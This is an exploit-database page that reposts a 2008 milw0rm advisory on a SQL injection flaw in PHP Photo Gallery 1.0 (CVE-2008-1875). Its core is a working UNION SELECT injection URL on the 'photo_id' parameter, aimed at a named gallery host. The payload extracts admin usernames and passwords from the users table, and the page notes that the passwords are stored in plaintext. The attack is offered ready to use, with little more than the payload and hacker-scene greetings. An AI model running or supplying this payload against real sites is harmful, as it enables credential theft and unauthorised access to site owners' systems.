[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Photo Gallery 1.0 - 'photo_id' SQL Injection

Author: t0pP8uZz
type: webapps
platform: php
port: 
date_added: 2008-04-03 
date_updated: 2016-11-17 
verified: 1 
codes: OSVDB-44400;CVE-2008-1875;OSVDB-44164;CVE-2008-1711 
tags: 
aliases:  
screenshot_url:  
application_url: 
--==+================================================================================+==--
--==+		   PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 4 April 2008
SITE: http://www.terong.com/products/advanced-photo-gallery/
DORK: N/A


DESCRIPTION:
PHP Photo Gallery is vulnerable due to insecure mysql querys.
The below "mysql injection" will display the admin username/password in plaintext.


EXPLOITS:
http://gallery.terong.biz/index.php?photo_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password,0x3a,admin),4/**/FROM/**/users/**/WHERE/**/admin=0x59/*


NOTE/TIP:
passwords are in plaintext


GREETZ: milw0rm.com, h4ck-y0u.org !



--==+================================================================================+==--
--==+		   PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-04]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.